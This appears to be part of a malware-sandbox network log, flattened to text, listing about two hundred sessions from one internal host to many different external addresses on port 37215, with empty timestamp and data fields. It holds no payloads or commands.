                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8456192.168.2.1338084157.130.207.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8457192.168.2.1354816203.10.191.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8458192.168.2.135785241.45.233.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8459192.168.2.1349294197.101.106.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8460192.168.2.1354922101.246.211.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8461192.168.2.13513144.127.90.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8462192.168.2.1350198157.215.141.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8463192.168.2.135026217.17.123.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8464192.168.2.135578041.88.154.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8465192.168.2.1354854197.243.141.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8466192.168.2.134652442.121.136.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8467192.168.2.135682486.173.62.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8468192.168.2.1338014197.28.196.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8469192.168.2.1360366197.222.19.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8470192.168.2.1337702197.150.209.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8471192.168.2.1333644197.147.54.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8472192.168.2.1349394197.239.222.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8473192.168.2.1358250157.220.38.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8474192.168.2.1351288157.26.147.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8475192.168.2.134922241.162.34.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8476192.168.2.133351041.25.175.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8477192.168.2.1355538197.201.199.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8478192.168.2.1351820157.194.159.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8479192.168.2.134634041.223.153.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8480192.168.2.1344056197.204.82.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8481192.168.2.1347478203.246.73.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8482192.168.2.1337106121.20.218.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8483192.168.2.1342882157.95.226.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8484192.168.2.133717641.120.182.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8485192.168.2.1336406197.164.120.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8486192.168.2.136032087.13.11.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8487192.168.2.133456041.103.251.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8488192.168.2.135432841.109.184.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8489192.168.2.1352602157.63.13.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8490192.168.2.134266441.224.255.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8491192.168.2.1358828160.98.100.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8492192.168.2.13574502.58.44.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8493192.168.2.135992041.48.44.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8494192.168.2.1356976198.253.172.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8495192.168.2.1344730157.141.187.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8496192.168.2.133882041.22.177.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8497192.168.2.1342186197.155.177.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8498192.168.2.1344514157.41.156.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8499192.168.2.135693241.109.15.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8500192.168.2.133380241.93.195.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8501192.168.2.1343016197.234.224.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8502192.168.2.135166441.143.103.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8503192.168.2.1350590197.122.212.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8504192.168.2.1359514124.54.187.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8505192.168.2.135175641.194.135.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8506192.168.2.1351888157.136.145.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8507192.168.2.1335124186.163.183.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8508192.168.2.134089057.119.162.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8509192.168.2.1359130157.15.119.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8510192.168.2.1344084157.13.242.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8511192.168.2.133545641.208.202.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8512192.168.2.135392641.235.240.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8513192.168.2.1353440197.104.49.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8514192.168.2.1348538197.227.155.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8515192.168.2.1360438146.172.129.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8516192.168.2.1334180140.126.44.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8517192.168.2.134022651.203.181.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8518192.168.2.133338841.46.229.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8519192.168.2.134420434.73.56.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8520192.168.2.1358232157.145.248.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8521192.168.2.1337784197.106.132.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8522192.168.2.135203841.116.157.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8523192.168.2.1352304157.243.166.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8524192.168.2.1337096197.1.244.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8525192.168.2.134191641.85.126.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8526192.168.2.1349480197.0.154.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8527192.168.2.134299441.154.219.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8528192.168.2.135748241.69.249.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8529192.168.2.1335190157.107.189.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8530192.168.2.1339124103.78.234.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8531192.168.2.1355254197.224.135.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8532192.168.2.1341766197.2.146.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8533192.168.2.1360018157.44.133.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8534192.168.2.135853841.48.241.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8535192.168.2.135393041.206.181.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8536192.168.2.133604041.86.23.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8537192.168.2.1354052157.209.64.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8538192.168.2.1345022197.121.5.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8539192.168.2.1348850197.252.124.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8540192.168.2.135075098.250.41.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8541192.168.2.1346300157.152.77.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8542192.168.2.133962441.225.125.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8543192.168.2.1350636197.241.251.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8544192.168.2.1336218197.0.84.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8545192.168.2.1350618197.83.53.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8546192.168.2.1333444157.83.204.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8547192.168.2.1351948197.78.89.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8548192.168.2.1355698157.79.176.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8549192.168.2.13364545.189.140.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8550192.168.2.1350974157.166.62.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8551192.168.2.134046641.43.30.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8552192.168.2.1346216197.223.102.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8553192.168.2.135074641.20.246.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8554192.168.2.133569841.177.31.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8555192.168.2.1346474102.25.33.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8556192.168.2.1335404197.157.140.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8557192.168.2.135926641.236.88.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8558192.168.2.1357174197.186.96.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8559192.168.2.135231841.13.238.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8560192.168.2.1353724126.152.209.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8561192.168.2.1334810157.8.80.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8562192.168.2.133864441.143.237.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8563192.168.2.135640441.60.135.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8564192.168.2.1354566221.22.203.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8565192.168.2.1345302197.248.73.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8566192.168.2.1347850197.155.12.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8567192.168.2.13442005.180.184.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8568192.168.2.1345610133.8.2.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8569192.168.2.1341940197.8.44.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8570192.168.2.136013641.15.84.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8571192.168.2.1334534101.232.88.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8572192.168.2.1345562213.203.239.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8573192.168.2.134315641.253.157.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8574192.168.2.1353114157.192.16.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8575192.168.2.135005641.140.28.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8576192.168.2.1338382183.200.226.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8577192.168.2.1353956197.232.252.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8578192.168.2.1351718157.154.198.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8579192.168.2.1333170157.215.200.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8580192.168.2.135126841.234.90.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8581192.168.2.1348422157.213.46.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8582192.168.2.134761041.131.231.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8583192.168.2.135063441.145.252.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8584192.168.2.1345878197.142.18.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8585192.168.2.1354048157.209.137.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8586192.168.2.135302041.207.153.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8587192.168.2.133786681.245.130.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8588192.168.2.1353482157.160.98.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8589192.168.2.1354396157.199.178.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8590192.168.2.1354366197.74.90.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8591192.168.2.1342644157.56.90.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8592192.168.2.135218093.98.176.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8593192.168.2.135270823.89.251.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8594192.168.2.1336200197.42.233.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8595192.168.2.1347104158.177.149.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8596192.168.2.134996641.193.67.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8597192.168.2.1340670197.132.227.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8598192.168.2.1339698143.69.96.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8599192.168.2.1349060155.223.52.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8600192.168.2.133337641.173.243.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8601192.168.2.135491841.184.133.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8602192.168.2.1348276197.166.74.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8603192.168.2.1351900157.51.78.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8604192.168.2.1333934197.133.234.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8605192.168.2.1352734197.119.215.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8606192.168.2.1338884157.149.60.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8607192.168.2.1358966197.90.179.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8608192.168.2.1340800186.178.135.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8609192.168.2.1347494200.237.91.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8610192.168.2.1359148157.58.117.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8611192.168.2.1340512157.175.241.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8612192.168.2.134012841.204.172.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8613192.168.2.1349374178.213.107.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8614192.168.2.1336620157.245.0.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8615192.168.2.1333878197.147.159.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8616192.168.2.1341036197.72.3.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8617192.168.2.1333550197.198.99.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8618192.168.2.1344086197.211.15.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8619192.168.2.1344822197.59.212.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8620192.168.2.1360400197.12.141.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8621192.168.2.135101041.19.231.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8622192.168.2.133290241.164.34.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8623192.168.2.134972499.0.70.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8624192.168.2.134301841.181.168.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8625192.168.2.134349441.74.17.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8626192.168.2.1339288197.144.227.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8627192.168.2.1357792208.24.179.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8628192.168.2.1359240197.60.81.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8629192.168.2.1352174157.241.192.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8630192.168.2.135224441.49.49.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8631192.168.2.134587841.126.252.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8632192.168.2.133411841.98.215.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8633192.168.2.1342054157.25.206.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8634192.168.2.1353414157.86.136.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8635192.168.2.134649241.22.16.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8636192.168.2.1340448157.121.214.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8637192.168.2.135864824.88.148.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8638192.168.2.1354760197.243.22.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8639192.168.2.1335978157.41.13.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8640192.168.2.1334156197.53.175.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8641192.168.2.1341820197.73.32.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8642192.168.2.1347440197.132.8.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8643192.168.2.1347442157.91.112.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8644192.168.2.1340872157.44.141.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8645192.168.2.1342072197.247.250.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8646192.168.2.1351142197.206.192.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8647192.168.2.134567041.52.249.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8648192.168.2.1334006197.36.161.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8649192.168.2.1360462197.220.113.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8650192.168.2.1351564157.103.72.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8651192.168.2.1345374142.234.236.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8652192.168.2.1342716194.35.105.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8653192.168.2.134848841.89.53.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8654192.168.2.1354266157.231.134.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8655192.168.2.1359612157.56.71.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8656192.168.2.1355230197.82.5.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8657192.168.2.1354526157.122.200.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8658192.168.2.134476241.40.97.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8659192.168.2.1345126157.80.104.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8660192.168.2.1360890121.53.196.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8661192.168.2.1334390157.19.152.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8662192.168.2.133621241.76.251.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8663192.168.2.1336776157.45.60.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8664192.168.2.133400854.20.221.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
